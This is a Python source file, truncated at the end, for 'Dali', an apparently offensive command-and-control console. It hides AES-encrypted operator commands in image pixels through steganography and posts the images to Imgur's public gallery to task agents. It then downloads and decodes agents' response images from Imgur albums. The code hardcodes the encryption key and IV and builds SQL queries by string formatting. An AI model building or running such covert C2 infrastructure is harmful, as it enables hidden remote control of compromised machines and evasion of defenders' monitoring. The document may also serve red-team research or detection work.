TODO: add auto-complete # this just gives us a nice CLI for our program class MyPrompt(Cmd): prompt = Style.BRIGHT + Fore.MAGENTA + "Dali> " + Style.RESET_ALL def do_help(self, inp): print("\n") print("Valid Commands:\t\tDescription:") print("Image\t\t\tCreate an image for agent tasking") print("Album\t\t\tCreate an album for agent responses") print("Agent\t\t\tCreate an agent entity") print("Task\t\t\tCreate tasking for agent") print("List\t\t\tList images, albums, agents, and tasks") print("Delete\t\t\tDelete images, albums, agents, and tasks") print("Response\t\tRetrieve responses from tasked agents") print("Exit/Quit\t\tExit program") print("\n") def default(self, inp): print("\n") print("Valid Commands:\t\tDescription:") print("Image\t\t\tCreate an image for agent tasking") print("Album\t\t\tCreate an album for agent responses") print("Agent\t\t\tCreate an agent entity") print("Task\t\t\tCreate tasking for agent") print("List\t\t\tList images, albums, agents, and tasks") print("Delete\t\t\tDelete images, albums, agents, and tasks") print("Response\t\tRetrieve responses from tasked agents") print("Exit/Quit\t\tExit program") print("\n") def do_Exit(self, inp): sys.exit(0) def do_exit(self, inp): sys.exit(0) def do_Quit(self, inp): sys.exit(0) def do_quit(self, inp): sys.exit(0) def do_Image(self, inp): self.do_image(inp) # this creates our stego'd image with the appropriate options set def do_image(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Image> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in create_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn) or ('cd ..' 
in inn): break elif inn[0] == 'set': # get input for the command we want to encode into the image if inn[1] == 'command': create_options['Command'] = " ".join(inn[2:]) # get input for whether or not we expect agent to respond elif inn[1] == 'response': try: if inn[2][0] == 's': create_options['Response (No,Short,Long)'] = 'Short' create_options['Client-ID'] = '' create_options['Album-ID'] = '' if 'Bearer-Token' in create_options: del create_options['Bearer-Token'] elif inn[2][0] == 'n': create_options['Response (No,Short,Long)'] = 'No' if 'Client-ID' in create_options: del create_options['Client-ID'] if 'Album-ID' in create_options: del create_options['Album-ID'] if 'Bearer-Token' in create_options: del create_options['Bearer-Token'] elif inn[2][0] == 'l': create_options['Response (No,Short,Long)'] = 'Long' create_options['Bearer-Token'] = '' create_options['Album-ID'] = '' if 'Client-ID' in create_options: del create_options['Client-ID'] except: self.print_valid_commands() # get input for which image we want to edit elif inn[1] == 'base-image': try: create_options['Base-Image'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['base', 'image']: try: create_options['Base-Image'] = inn[3] except: self.print_valid_commands() # get input for where will save stego'd image elif inn[1] == 'new-filename': try: create_options['New-Filename'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['new', 'filename']: try: create_options['New-Filename'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'client-id': try: create_options['Client-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['client', 'id']: try: create_options['Client-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'album-id': try: create_options['Album-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['album', 'id']: try: create_options['Album-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: create_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: create_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': create_options['Command'] = '' create_options['Response (No,Short,Long)'] = '' create_options['Base-Image'] = '' create_options['New-Filename'] = '' if 'Client-ID' in create_options: del create_options['Client-ID'] del create_options['Album-ID'] elif 'Bearer-Token' in create_options: del create_options['Bearer-Token'] del create_options['Album-ID'] # make sure all variables have been set, then export those to those to the functions elif inn[0] == 'go': missing = [] for key, value in create_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: command = create_options['Command'] response = create_options['Response (No,Short,Long)'] img_path = create_options['Base-Image'] img_name = create_options['New-Filename'] mycursor = mydb.cursor() test_name = os.path.abspath(img_name) sql = "SELECT * FROM Pictures WHERE filename = '{0}'".format(test_name) mycursor.execute(sql) test_results = mycursor.fetchall() if test_results: print("\nNew-Filename already exists, please use a different name.\n") return mycursor.close() if 'Client-ID' in create_options: client_id = create_options['Client-ID'] # lookup album id in mysql and 
retrieve delete hash album_id = int(create_options['Album-ID']) mycursor = mydb.cursor() sql = "SELECT Delete_Hash FROM Albums WHERE ID = {0}".format(album_id) mycursor.execute(sql) album_deletehash_tuple = mycursor.fetchall() mycursor.close() if album_deletehash_tuple: for x in album_deletehash_tuple: album_deletehash = x[0] else: print("\nPlease create an album first.\n") return self.create_image(command, response, img_path, img_name, client_id, album_deletehash) elif 'Bearer-Token' in create_options: bearer_token = create_options['Bearer-Token'] album_id = int(create_options['Album-ID']) mycursor = mydb.cursor() sql = "SELECT Delete_Hash FROM Albums WHERE ID = {0}".format(album_id) mycursor.execute(sql) album_deletehash_tuple = mycursor.fetchall() mycursor.close() if album_deletehash_tuple: for x in album_deletehash_tuple: album_deletehash = x[0] else: print("\nPlease create an album first.\n") return self.create_image(command, response, img_path, img_name, bearer_token, album_deletehash) else: self.print_valid_commands() def do_Album(self, inp): self.do_album(inp) # this sets up the options and then exports the variables and their values to the create_function() # this is obviously used to create either an authenticated or unauthenticated album for agents to respond in def do_album(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Album> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in album_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn): break elif inn[0] == 'set': # get input for the album we want to create if inn[1] == 'auth-type': try: if inn[2][0] == "a": album_options['Auth-Type'] = "Auth" album_options['Bearer-Token'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif inn[2][0] == "u": album_options['Auth-Type'] = "Unauth" album_options['Client-ID'] = '' if 'Bearer-Token' in album_options: del album_options['Bearer-Token'] except: self.print_valid_commands() elif inn[1:3] == ['auth', 'type']: try: if inn[3][0] == "a": album_options['Auth-Type'] = "Auth" album_options['Bearer-Token'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif inn[3][0] == "u": album_options['Auth-Type'] = "Unauth" album_options['Client-ID'] = '' if 'Bearer-Token' in album_options: del album_options['Bearer-Token'] except: self.print_valid_commands() elif inn[1] == 'client-id': try: album_options['Client-ID'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['client', 'id']: try: album_options['Client-ID'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: album_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: album_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'title': try: album_options['Title'] = " ".join(inn[2:]) except: self.print_valid_commands() elif inn[0] == 'reset': album_options['Auth-Type'] = '' album_options['Title'] = '' if 'Client-ID' in album_options: del album_options['Client-ID'] elif 'Bearer-Token' in album_options: del album_options['Bearer-Token'] # make sure all variables have been set, then export those to those to the functions elif inn[0] == 'go': missing = [] for key, value in album_options.items(): if value == '': missing.append(key) if missing: 
print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: if 'Bearer-Token' in album_options: token = album_options['Bearer-Token'] elif 'Client-ID' in album_options: token = album_options['Client-ID'] auth_type = album_options['Auth-Type'] album_title = album_options['Title'] self.create_album(token, album_title, auth_type) else: self.print_valid_commands() def do_Agent(self, inp): self.do_agent(inp) # this simply creates a logical entity representing an agent # since this project doesn't have a real agent/implant, this is just a representation for bookeeping def do_agent(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Agent> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in agent_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn): break elif inn[0] == 'set': if inn[1] == 'title': try: agent_options['Title'] = " ".join(inn[2:]) except: self.print_valid_commands() elif inn[1] == 'tags': try: agent_options['Tags'] = inn[2] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': agent_options['Title'] = '' agent_options['Tags'] = '' elif inn[0] == 'go': missing = [] for key, value in agent_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: agent_title = agent_options['Title'] agent_tags = agent_options['Tags'] status = 'IDLE' mycursor = mydb.cursor() execution = "INSERT INTO Agents (Title, Tags, Status) VALUES (%s, %s, %s)" values = (agent_title, agent_tags, status) try: mycursor.execute(execution, values) mydb.commit() last_id = mycursor.lastrowid print("\nAgent entity created with ID: " + Style.BRIGHT + Fore.YELLOW + str(last_id) + Style.RESET_ALL + "\n") mycursor.close() except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() def do_Task(self, inp): self.do_task(inp) # sets up all of our tasking options and then calls create_tasking() # used to upload images to the public gallery so the agent can get it and get tasked def do_task(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Task> " + Style.RESET_ALL).lower().split() if 'options' in inn: print('\n---OPTIONS---') for key, value in tasking_options.items(): if value == '': print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ': None') else: print(Style.BRIGHT + Fore.CYAN + key + Style.RESET_ALL, ':', value) print("\n") elif ('exit' in inn) or ('quit' in inn) or ('cd ..' 
in inn): break elif inn[0] == 'set': if inn[1] == 'tasking-image': try: tasking_options['Tasking-Image'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['tasking', 'image']: try: tasking_options['Tasking-Image'] = inn[3] except: self.print_valid_commands() elif inn[1] == 'title': try: proper = [] for x in inn[2:]: proper.append(x.capitalize()) tasking_options['Title'] = " ".join(proper) except: self.print_valid_commands() elif inn[1] == 'tags': try: tasking_options['Tags'] = inn[2] except: self.print_valid_commands() elif inn[1] == 'agent': try: tasking_options['Agent'] = inn[2] except: self.print_valid_commands() elif inn[1] == 'bearer-token': try: tasking_options['Bearer-Token'] = inn[2] except: self.print_valid_commands() elif inn[1:3] == ['bearer', 'token']: try: tasking_options['Bearer-Token'] = inn[3] except: self.print_valid_commands() # give user option to reset values for options elif inn[0] == 'reset': tasking_options['Tasking-Image'] = '' tasking_options['Title'] = '' tasking_options['Tags'] = '' tasking_options['Agent'] = '' tasking_options['Bearer-Token'] = '' elif inn[0] == 'go': missing = [] for key, value in tasking_options.items(): if value == '': missing.append(key) if missing: print("\n") print("Please set these option values:") for x in missing: print(Style.BRIGHT + Fore.CYAN + x + Style.RESET_ALL) print("\n") else: agent_id = int(tasking_options['Agent']) title = tasking_options['Title'] tags = tasking_options['Tags'] task_image = tasking_options['Tasking-Image'] token = tasking_options['Bearer-Token'] mycursor = mydb.cursor() sql = "SELECT * FROM Agents WHERE ID = {0}".format(agent_id) mycursor.execute(sql) agent_tuple = mycursor.fetchall() if agent_tuple: execution = "SELECT Status FROM Agents WHERE ID = {0}".format(agent_id) mycursor.execute(execution) task_check = mycursor.fetchall() task_check = task_check[0][0] if task_check == 'TASKED': print("\nAgent is already tasked, wait for response or delete previous tasking.\n") return else: print("\nAgent: " + str(agent_id) + " does not exist, please create the agent first.\n") sql = "SELECT * FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(sql) image_tuple = mycursor.fetchall() if image_tuple: mycursor.close() self.create_tasking(agent_id, title, tags, task_image, token) else: print("\nImage: " + str(task_image) + " does not exist, please create the image first.\n") mycursor.close() else: self.print_valid_commands() def do_Delete(self, inp): self.do_list(inp) def do_delete(self, inp): self.do_list(inp) def do_List(self, inp): self.do_list(inp) # used to list all of the entites we have created in MySQL # can also be used to delete the entities we have created def do_list(self, inp): while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/List-Delete> " + Style.RESET_ALL).lower().split() if 'images' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Pictures") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Filename: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + "Command: " + Style.RESET_ALL + x[3] + " | " + Style.BRIGHT + Fore.CYAN + "Response-type: " + Style.RESET_ALL + x[4] + " | " + Style.BRIGHT + Fore.CYAN + "MD5: " + Style.RESET_ALL + str(x[1])) if myresult: print("\n") else: print("\nNo image entities exist.\n") mycursor.close() elif 'albums' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Albums") 
myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Album-Hash: " + Style.RESET_ALL + x[1] + " | " + Style.BRIGHT + Fore.CYAN + "Delete-Hash: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + 'Auth-Type: ' + Style.RESET_ALL + x[3]) if myresult: print("\n") else: print("\nNo album entities exist.\n") mycursor.close() elif 'agents' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Agents") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "ID: " + Style.RESET_ALL + str(x[0]) + " | " + Style.BRIGHT + Fore.CYAN + "Status: " + Style.RESET_ALL + str(x[1]) + " | " + Style.BRIGHT + Fore.CYAN + "Title: " + Style.RESET_ALL + x[2] + " | " + Style.BRIGHT + Fore.CYAN + "Tags: " + Style.RESET_ALL + x[3]) if myresult: print("\n") else: print("\nNo agent entities exist.\n") mycursor.close() elif 'tasks' in inn: mycursor = mydb.cursor() mycursor.execute("SELECT * FROM Tasking") myresult = mycursor.fetchall() if myresult: print("\n") for x in myresult: print(Style.BRIGHT + Fore.CYAN + "Tasked Agent: " + Style.RESET_ALL + str(x[5]) + " | " + Style.BRIGHT + Fore.CYAN + "Response: " + Style.RESET_ALL + str(x[2]) + " | " + Style.BRIGHT + Fore.CYAN + "Tasking-Command: " + Style.RESET_ALL + x[1] + " | " + Style.BRIGHT + Fore.CYAN + "Tasking-Image: " + Style.RESET_ALL + str(x[0])) if myresult: print("\n") else: print("\nNo task entities exist.\n") mycursor.close() elif inn[0] == 'delete': try: if inn[1] == 'album': try: mycursor = mydb.cursor() execution = "DELETE FROM Albums WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nAlbum-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'image': try: mycursor = mydb.cursor() execution = "DELETE FROM Pictures WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nImage-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'agent': try: mycursor = mydb.cursor() execution = "DELETE FROM Agents WHERE ID = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nAgent-ID: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif inn[1] == 'task': try: mycursor = mydb.cursor() execution = "SELECT Agent from Tasking WHERE Tasking_Image = {0}".format(inn[2]) mycursor.execute(execution) agent_result = mycursor.fetchall() agent_result = agent_result[0][0] agent_result = int(agent_result) execution = "UPDATE Agents SET Status='IDLE' WHERE ID= {0}".format(agent_result) mycursor.execute(execution) mydb.commit() execution = 
"DELETE FROM Tasking WHERE Tasking_Image = {0}".format(inn[2]) mycursor.execute(execution) mydb.commit() mycursor.close() print("\nTasking from Tasking-Image: " + Style.BRIGHT + Fore.YELLOW + str(inn[2]) + Style.RESET_ALL + " successfully deleted.\n") except: print(Style.BRIGHT + Fore.CYAN + "\nValid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") except: print(Style.BRIGHT + Fore.CYAN + "\nValid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agent-ID>") print("Delete Task <Tasking-Image-ID>\n") elif ('exit' in inn) or ('quit' in inn): break else: print(Style.BRIGHT + Fore.CYAN + "\nValid List Commands:" + Style.RESET_ALL) print("Albums/List Albums") print("Images/List Images") print("Agents/List Agents") print("Tasks/List Tasks\n") print(Style.BRIGHT + Fore.CYAN + "Valid Delete Commands:" + Style.RESET_ALL) print("Delete Album <Album-ID>") print("Delete Image <Image-ID>") print("Delete Agent <Agents-ID>") print("Delete Task <Tasking-Image-ID>\n") def do_response(self, inp): self.do_Response(inp) # probably the most complex method. this one checks for responses by: # 1. looking up 'PENDING' statuses in the Tasking table # 2. looks up the images used on those Tasks and then gets the album those images specified for response # 3. uses the API to query those albums for images, if there are images, it counts as a response # 4. decodes the response image, saves the response base64 encoded in the Tasking table under 'Response' # 5. updates the status of the Agent to 'IDLE' # 6. deletes the original tasking in the Gallery, phew! # if choose, you can view simply the amount of responses found by the method or # view responses individually. 
they are time stamped :) def do_Response(self, inp): # get total number of PENDING tasks mycursor = mydb.cursor() execution = "SELECT * FROM Tasking WHERE Response = 'PENDING'" mycursor.execute(execution) results_tuple_list = mycursor.fetchall() counter = 0 image_ids = [] while counter < len(results_tuple_list): image_ids.append(results_tuple_list[counter][0]) counter += 1 delete_hashes = [] for x in image_ids: x = int(x) execution = "SELECT album_deletehash FROM Pictures WHERE ID={0}".format(x) mycursor.execute(execution) delete_hashes += mycursor.fetchall() album_hashes = [] for x in delete_hashes: x = x[0] execution = "SELECT Album_Hash,Auth_Type,Token FROM Albums WHERE Delete_Hash='{0}'".format(x) mycursor.execute(execution) album_hashes += mycursor.fetchall() mega_counter = 0 while mega_counter < len(album_hashes): url = 'https://api.imgur.com/3/album/' + album_hashes[mega_counter][0] + '/images' if album_hashes[mega_counter][1] == 'Unauth': headers = {'Authorization': 'Client-ID ' + album_hashes[mega_counter][2]} elif album_hashes[mega_counter][1] == 'Auth': headers = {'Authorization': 'Bearer ' + album_hashes[mega_counter][2]} r = requests.get(url, headers=headers) response = r.content response = json.loads(response.decode()) data = response.get('data', {}) if data: agent_image_link = data[0]['link'] r = requests.get(agent_image_link) img = Image.open(BytesIO(r.content)) pixels = img.load() decode_keys = {'00000001': '=', '00000010': '/', '00000011': '+', '00000100': 'Z', '00000101': 'Y', '00000110': 'X', '00000111': 'W', '00001000': 'V', '00001001': 'U', '00001010': 'T', '00001011': 'S', '00001100': 'R', '00001101': 'Q', '00001110': 'P', '00001111': 'O', '00010000': 'N', '00010001': 'M', '00010010': 'L', '00010011': 'K', '00010100': 'J', '00010101': 'I', '00010110': 'H', '00010111': 'G', '00011000': 'F', '00011001': 'E', '00011010': 'D', '00011011': 'C', '00011100': 'B', '00011101': 'A', '00011110': 'z', '00011111': 'y', '00100000': 'x', '00100001': 'w', '00100010': 'v', '00100011': 'u', '00100100': 't', '00100101': 's', '00100110': 'r', '00100111': 'q', '00101000': 'p', '00101001': 'o', '00101010': 'n', '00101011': 'm', '00101100': 'l', '00101101': 'k', '00101110': 'j', '00101111': 'i', '00110000': 'h', '00110001': 'g', '00110010': 'f', '00110011': 'e', '00110100': 'd', '00110101': 'c', '00110110': 'b', '00110111': 'a', '00111000': '9', '00111001': '8', '00111010': '7', '00111011': '6', '00111100': '5', '00111101': '4', '00111110': '3', '00111111': '2', '01000000': '1', '01000001': '0'} reds = [] for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): reds.append(pixels[i,j][0]) bytez = [] for i in reds: bytez.append('{:08b}'.format(i)) differences = [] counter = 0 while counter < len(bytez): differences.append(str(abs(int(bytez[counter][7]) - int(bytez[counter + 1][7])))) counter += 2 binaries = [] counter = 0 while counter < len(differences): command = '' for item in differences[counter:counter + 8]: command += item binaries.append(command) counter += 8 counter = 0 command_decoded = '' while counter < len(binaries): if binaries[counter] in decode_keys: command_decoded += decode_keys[binaries[counter]] counter += 1 else: break command_decoded = command_decoded.encode() command_decoded = base64.b64decode(command_decoded) key = 'dali melts clock' iv = 'this is an iv456' decryption_scheme = AES.new(key, AES.MODE_CBC, iv) decrypted_command = decryption_scheme.decrypt(command_decoded) decrypted_command = decrypted_command.decode("utf-8") decrypted_command = 
str(decrypted_command).rstrip("~") le_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(time.time())) final = decrypted_command + "^" + le_time final = base64.b64encode(final.encode()) final = final.decode("utf-8") task_image = image_ids[mega_counter] mycursor = mydb.cursor() execution = "SELECT Image_Hash,Token FROM Tasking WHERE Tasking_Image={0}".format(task_image) mycursor.execute(execution) results_tuple_list = mycursor.fetchall() image_hash = results_tuple_list[0][0] token = results_tuple_list[0][1] url = 'https://api.imgur.com/3/image/' + image_hash headers = {'Authorization': 'Bearer ' + token} r = requests.delete(url, headers=headers) response = r.content response = json.loads(response.decode()) execution = "UPDATE Tasking SET Response ='{0}' WHERE Tasking_Image={1}".format(final,task_image) mycursor.execute(execution) mydb.commit() execution = "SELECT Agent FROM Tasking WHERE Tasking_Image={0}".format(task_image) mycursor.execute(execution) results_tuple_list = mycursor.fetchall() agent = results_tuple_list[0][0] execution = "UPDATE Agents SET Status = 'IDLE' WHERE ID={0}".format(agent) mycursor.execute(execution) mydb.commit() mycursor.close() mega_counter += 1 else: mega_counter += 1 while True: inn = input(Style.BRIGHT + Fore.MAGENTA + "Dali/Response> " + Style.RESET_ALL).lower().split() if 'options' in inn: print("\nValid Commands:") print("List Responses") print("Get Response <Agent-ID>\n") elif inn[0] == "list": try: mycursor = mydb.cursor() execution = "SELECT * FROM Agents WHERE Status !='PENDING'" mycursor.execute(execution) agent_results_tuple = mycursor.fetchall() if agent_results_tuple: print("\n") for x in agent_results_tuple: print("Tasking response from " + Style.BRIGHT + Fore.CYAN + "Agent-ID: " + str([x][0][0]) + Style.RESET_ALL + " found.") mycursor.close() print("\n") except Exception as e: print(e) elif inn[0] == "get": try: response_agent = int(inn[2]) mycursor = mydb.cursor() execution = "SELECT Response FROM Tasking WHERE Agent={0}".format(response_agent) mycursor.execute(execution) response_results = mycursor.fetchall() response = response_results[0][0] response = response.encode() response_results = base64.b64decode(response) response_results = response_results.decode("utf-8") response_results = response_results.split("^") print(Style.BRIGHT + Fore.CYAN + "\n---RESPONSE FROM AGENT " + str(response_agent) + " (received at: " + response_results[1] + ")---" + Style.RESET_ALL + "\n") print(response_results[0] + "\n") except Exception as e: print(e) elif ('exit' in inn) or ('quit' in inn): break else: print("\nValid Commands:") print("List Responses") print("Get Response <Agent-ID>\n") # simply uses the API to do an album creation either auth or unauth # unauth uses a client-id, auth uses a bearer token def create_album(self, token, album_title, auth_type): url = 'https://api.imgur.com/3/album' if auth_type == 'Unauth': headers = {'Authorization': 'Client-ID ' + token} elif auth_type == 'Auth': headers = {'Authorization': 'Bearer ' + token} files = {'title': (None, album_title)} r = requests.post(url, headers=headers, files=files) response = r.content response = json.loads(response.decode()) album_id = response.get('data', {}).get('id') album_deletehash = response.get('data', {}).get('deletehash') if r.status_code == 200: print("\nAlbum created successfully with Album-Hash: " + Style.BRIGHT + Fore.YELLOW + str(album_id) + Style.RESET_ALL + ", Delete-hash: " + Style.BRIGHT + Fore.YELLOW + str(album_deletehash) + Style.RESET_ALL) print("\n") else: 
print("Album creation failed, printing response...") print(response) return mycursor = mydb.cursor() execution = "INSERT INTO Albums (Album_Hash, Delete_Hash, Auth_Type, Token) VALUES (%s, %s, %s, %s)" values = (album_id, album_deletehash, auth_type, token) try: mycursor.execute(execution, values) except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() # actually does the creation of the image file on disk # stego method explained in great detail on my blog def create_image(self, command, response, img_path, img_name, token, album_deletehash): preserved_command = command command = response.lower()[0] + "^" + token + "^" + command + "^" + str(album_deletehash) # pad the command to a multiple of 16 for AES encryption while len(command) % 16 != 0: command += "~" # key and iv can be anything you want, time to encrypt key = 'dali melts clock' iv = 'this is an iv456' encryption_scheme = AES.new(key, AES.MODE_CBC, iv) command = encryption_scheme.encrypt(command) # we now have an encrypted byte-object. we can now b64 it and then decode it into a utf-8 string command_encoded = base64.b64encode(command) command_encoded = command_encoded.decode("utf-8") # this dictionary will associate a b64 character with a binary value (in string form) encode_keys = {'=': '00000001', '/': '00000010', '+': '00000011', 'Z': '00000100', 'Y': '00000101', 'X': '00000110', 'W': '00000111', 'V': '00001000', 'U': '00001001', 'T': '00001010', 'S': '00001011', 'R': '00001100', 'Q': '00001101', 'P': '00001110', 'O': '00001111', 'N': '00010000', 'M': '00010001', 'L': '00010010', 'K': '00010011', 'J': '00010100', 'I': '00010101', 'H': '00010110', 'G': '00010111', 'F': '00011000', 'E': '00011001', 'D': '00011010', 'C': '00011011', 'B': '00011100', 'A': '00011101', 'z': '00011110', 'y': '00011111', 'x': '00100000', 'w': '00100001', 'v': '00100010', 'u': '00100011', 't': '00100100', 's': '00100101', 'r': '00100110', 'q': '00100111', 'p': '00101000', 'o': '00101001', 'n': '00101010', 'm': '00101011', 'l': '00101100', 'k': '00101101', 'j': '00101110', 'i': '00101111', 'h': '00110000', 'g': '00110001', 'f': '00110010', 'e': '00110011', 'd': '00110100', 'c': '00110101', 'b': '00110110', 'a': '00110111', '9': '00111000', '8': '00111001', '7': '00111010', '6': '00111011', '5': '00111100', '4': '00111101', '3': '00111110', '2': '00111111', '1': '01000000', '0': '01000001'} try: img = Image.open(img_path) except: print("Could not locate file, restarting...\n") return pixels = img.load() reds = [] for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): reds.append(pixels[i,j][0]) bytez = [] for i in reds: bytez.append('{:08b}'.format(i)) differences = [] counter = 0 while counter < len(bytez): differences.append(str(abs(int(bytez[counter][7]) - int(bytez[counter + 1][7])))) counter += 2 # translate our b64 encoded string into the values in our encode_keys{} dict translation = [] for x in command_encoded: translation.append(encode_keys[x]) # this breaks down our encoded values into individual numbers so '01010101' becomes '0', '1', '0'... 
final = [] for x in translation: final += (list(x)) # create a list of indexes that vary between final[] and differences[] counter = 0 mismatch = [] while counter < len(final): if final[counter] != differences[counter]: mismatch.append(counter) counter += 1 else: counter += 1 mega_counter = 0 # at the indexes in which the organic differences and the needed differences aren't the same, change the first operand either +1 or -1 for x in mismatch: if reds[x*2] == 0: reds[x*2] = (reds[x*2] + 1) mega_counter += 1 elif reds[x*2] == 255: reds[x*2] = (reds[x*2] - 1) mega_counter += 1 else: reds[x*2] = (reds[x*2] + (random.choice([-1, 1]))) mega_counter += 1 terminator_index = len(command_encoded) * 8 * 2 term_diff = abs(reds[terminator_index] - reds[terminator_index + 1]) if term_diff % 2 == 0: if reds[terminator_index] == 255: reds[terminator_index] = 254 elif reds[terminator_index] == 0: reds[terminator_index] = 1 else: reds[terminator_index] = reds[terminator_index] + random.choice([-1,1]) counter = 0 for i in range(img.size[0]): # for every pixel: for j in range(img.size[1]): pixels[i,j] = (reds[counter], pixels[i,j][1], pixels[i,j][2]) counter += 1 try: img.save(img_name, "PNG") print(Style.BRIGHT + Fore.YELLOW + "\n" + str(img_name) + Style.RESET_ALL + " saved!\n") except: print(Style.BRIGHT + Fore.RED + "Image failed to save!\n" + Style.RESET_ALL) return BLOCKSIZE = 65536 hasher = hashlib.md5() with open(img_name, 'rb') as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) # create/gather values to update our Pictures table in MySQL digest = hasher.hexdigest() abspath = os.path.abspath(img_name) mycursor = mydb.cursor() execution = "INSERT INTO Pictures (md5, filename, command, response, token, album_deletehash) VALUES (%s, %s, %s, %s, %s, %s)" values = (digest, abspath, preserved_command, response, token, album_deletehash) try: mycursor.execute(execution, values) except mysql.connector.Error as err: print("Encountered MySQL error {}\n".format(err)) sys.exit(1) mydb.commit() mycursor.close() # creates the tasking by uploading our stego'd image to the gallery # in accordance with the options we set in the Task module def create_tasking(self, agent_id, title, tags, task_image, token): mycursor = mydb.cursor() execution = "SELECT filename FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(execution) filename_tuple = mycursor.fetchall() mycursor.close() filename = filename_tuple[0][0] headers = {'Authorization': 'Bearer ' + token} files = {'image': open(filename, 'rb')} url = 'https://api.imgur.com/3/upload' r = 